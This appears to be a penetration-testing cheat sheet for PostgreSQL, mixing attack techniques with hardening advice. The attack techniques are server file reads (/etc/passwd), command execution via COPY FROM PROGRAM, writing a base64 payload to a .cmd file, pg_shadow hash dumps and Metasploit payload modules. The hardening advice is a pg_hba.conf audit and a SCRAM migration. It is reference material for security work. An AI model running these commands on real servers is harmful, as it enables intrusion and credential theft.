PostgreSQL is an open source object-relational database system that uses and extends the SQL language.
Default port: 5432. PostgreSQL itself does not hop to another port if 5432 is busy (the server simply fails to start), but Debian/Ubuntu's cluster tooling (`pg_createcluster`) gives each additional cluster on the same host the next free port (5433, 5434, ...), so scan those ports as well when a host runs more than one cluster.
```
PORT     STATE SERVICE
5432/tcp open  pgsql
```
Connect
```bash
psql -U <myuser>                                  # Open psql console with user
psql -h <host> -U <username> -d <database>        # Remote connection
PGPASSWORD=<password> psql -h <host> -p <port> -U <username> <database>   # Remote connection, non-interactive password
# Note: -W only forces a password prompt; it does not take the password as an argument.
```
```sql
psql -h localhost -d <database_name> -U <User>  -- Password will be prompted
\list           -- List databases
\c <database>   -- use the database
\d              -- List tables
\du+            -- Get users roles

-- Read a file (needs superuser, or membership in pg_read_server_files on PG 11+)
CREATE TABLE demo(t text);
COPY demo FROM '[FILENAME]';
SELECT * FROM demo;

-- Write ascii to a file (COPY TO cannot write binary data, hence the base64 -> text conversion;
-- needs superuser or pg_write_server_files on PG 11+)
COPY (SELECT convert_from(decode('<B64 payload>','base64'),'utf-8')) TO 'C:\\some\\interesting\path.cmd';

-- List databases
SELECT datname FROM pg_database;

-- Read credentials (usernames + pwd hash); pg_shadow is readable by superusers only
SELECT usename, passwd FROM pg_shadow;

-- Check if current user is superuser: "on" means true, "off" means false
SELECT current_setting('is_superuser');

-- Check if plpgsql is enabled
SELECT lanname, lanacl FROM pg_language WHERE lanname = 'plpgsql';

-- Change password
ALTER USER user_name WITH PASSWORD 'new_password';

-- Check users privileges over a table (pg_shadow on this example)
SELECT grantee, privilege_type FROM information_schema.role_table_grants WHERE table_name = 'pg_shadow';

-- Get users roles
SELECT r.rolname, r.rolsuper, r.rolinherit, r.rolcreaterole, r.rolcreatedb, r.rolcanlogin,
       r.rolconnlimit, r.rolvaliduntil,
       ARRAY(SELECT b.rolname
             FROM pg_catalog.pg_auth_members m
             JOIN pg_catalog.pg_roles b ON (m.roleid = b.oid)
             WHERE m.member = r.oid) AS memberof,
       r.rolreplication
FROM pg_catalog.pg_roles r
ORDER BY 1;
```
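The file read and write tricks above silently fail (permission denied) unless the current role holds the right server-side privilege, and since PostgreSQL 11 those privileges are split into predefined roles rather than being superuser-only. The following is an added example, not code from the original page: it first checks which of those roles the current user has, then uses each capability (read, execute, write) in turn. The file paths and the `id` command are assumptions chosen for a Linux target; replace them as needed.

```sql
-- Added example: check server-side file/program privileges before using them.
-- pg_read_server_files, pg_write_server_files and pg_execute_server_program
-- exist from PostgreSQL 11 on; on older versions only superusers can do this
-- and the pg_has_role() calls below will error because the roles do not exist.
SELECT current_user,
       current_setting('is_superuser')                                   AS superuser,
       pg_has_role(current_user, 'pg_read_server_files',      'MEMBER')  AS can_read_files,
       pg_has_role(current_user, 'pg_write_server_files',     'MEMBER')  AS can_write_files,
       pg_has_role(current_user, 'pg_execute_server_program', 'MEMBER')  AS can_run_programs;

-- Read a file without creating a table (superuser or pg_read_server_files).
-- Arguments: path, byte offset, byte length. Path is an assumption.
SELECT pg_read_file('/etc/passwd', 0, 4096);

-- Same privilege, but line-oriented: load a file into a temp table via COPY.
CREATE TEMP TABLE demo_lines(t text);
COPY demo_lines FROM '/etc/hostname';
SELECT * FROM demo_lines;

-- Run an OS command as the postgres service account
-- (COPY ... FROM PROGRAM exists since 9.3; superuser or pg_execute_server_program).
CREATE TEMP TABLE cmd_out(line text);
COPY cmd_out FROM PROGRAM 'id';
SELECT * FROM cmd_out;

-- Write a file (superuser or pg_write_server_files). COPY TO writes text only,
-- so a binary payload must be base64-decoded into a text value first.
COPY (SELECT convert_from(decode('aGVsbG8K', 'base64'), 'utf-8'))
  TO '/tmp/pg_copy_test.txt';
```

Run the privilege query first: on a hardened server `can_read_files` and `can_run_programs` are usually false for the application role, and a non-superuser will also get "permission denied" on `pg_shadow`, so knowing the answer up front saves a lot of noisy failed statements in the server log.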
Enumeration
```
msf> use auxiliary/scanner/postgres/postgres_version
msf> use auxiliary/scanner/postgres/postgres_dbname_flag_injection
```
Client authentication is controlled by the config file pg_hba.conf (its location is set by the `hba_file` parameter in postgresql.conf). The file is a set of records, one per line, each in one of the record formats described in the PostgreSQL manual:
Each record specifies a connection type, a client IP address range (if relevant for the connection type), a database name, a user name, and the authentication method to be used for connections matching these parameters. The first record with a matching connection type, client address, requested database, and user name is used to perform authentication. There is no "fall-through" or "backup": if one record is chosen and the authentication fails, subsequent records are not considered. If no record matches, access is denied.
The password-based authentication methods in current versions are scram-sha-256 (PostgreSQL 10+, and the default `password_encryption` since 14), md5, and password. Older documentation also lists crypt, which was removed in 8.4. They differ in how the secret crosses the wire: SCRAM is a salted challenge-response, md5 sends an MD5 hash, and password sends the clear-text password (only defensible inside TLS). The method `trust` is not password-based at all: any connection matching the record is accepted without credentials. One compatibility limitation to remember: a `scram-sha-256` rule cannot authenticate a role whose stored password in pg_authid is still an md5 hash (the reverse direction works, an `md5` rule transparently falls back to SCRAM for a SCRAM-stored password), so check both the pg_hba.conf method and the stored hash format when authentication unexpectedly fails.
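Once you have a superuser session, the weak-authentication review described above can be done from inside the database instead of reading the file. The following is an added example, not code from the original page: it lists the pg_hba.conf rules that still permit `trust`, clear-text `password` or legacy `md5`, shows which hashing scheme new passwords get, and classifies the stored hashes per role. The view `pg_hba_file_rules` exists since PostgreSQL 10 and reads the file on disk (not the currently loaded rules), so it also shows edits that have not been reloaded yet. The role name `app_user` in the remediation step is an assumption.

```sql
-- Added example: audit authentication configuration from inside PostgreSQL.

-- 1. pg_hba.conf rules that allow weak or credential-less access (superuser only).
--    'error' is non-null for lines the server could not parse.
SELECT line_number, type, database, user_name, address, netmask, auth_method, options, error
FROM pg_hba_file_rules
WHERE auth_method IN ('trust', 'password', 'md5')
   OR error IS NOT NULL
ORDER BY line_number;

-- 2. Hashing scheme applied to NEW passwords (md5 on older servers, scram-sha-256 since 14).
SHOW password_encryption;

-- 3. Which login roles still carry md5 hashes, i.e. would fail under a scram-sha-256 rule
--    and are crackable offline from pg_authid (superuser only).
SELECT rolname,
       CASE WHEN rolpassword LIKE 'SCRAM-SHA-256$%' THEN 'scram-sha-256'
            WHEN rolpassword LIKE 'md5%'            THEN 'md5'
            WHEN rolpassword IS NULL                THEN 'no password'
            ELSE 'other'
       END AS hash_type
FROM pg_authid
WHERE rolcanlogin
ORDER BY rolname;

-- 4. Remediation for one role: store the password as SCRAM, then (after changing the
--    pg_hba.conf rule from md5/trust to scram-sha-256 on disk) reload without a restart.
SET password_encryption = 'scram-sha-256';
ALTER ROLE app_user WITH PASSWORD 'replace-me';   -- hypothetical role name
SELECT pg_reload_conf();
```

Step 4 deliberately re-hashes before the rule is switched; doing it in the other order locks the role out until its password is reset, because an md5 hash can never satisfy a scram-sha-256 rule.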
POST
```
msf> use auxiliary/scanner/postgres/postgres_hashdump
msf> use auxiliary/scanner/postgres/postgres_schemadump
msf> use auxiliary/admin/postgres/postgres_readfile
msf> use exploit/linux/postgres/postgres_payload     # needs superuser credentials
msf> use exploit/windows/postgres/postgres_payload   # needs superuser credentials
```
logging
Inside the postgresql.conf file you can enable statement logging by changing:
```
log_statement = 'all'
log_filename = 'postgresql-%Y-%m-%d_%H%M%S.log'
logging_collector = on
```
```bash
sudo service postgresql restart   # logging_collector only takes effect on restart;
                                  # log_statement alone can be applied with SELECT pg_reload_conf();
# Find the logs in /var/lib/postgresql/<PG_Version>/main/log/
# or in /var/lib/postgresql/<PG_Version>/main/pg_log/
```
Caveat: `log_statement = 'all'` records the full text of every statement, including secrets passed in `ALTER USER ... PASSWORD '...'` and `CREATE USER`. Treat the log directory as sensitive, and use psql's `\password` (which hashes client-side) when setting passwords on a server that logs statements.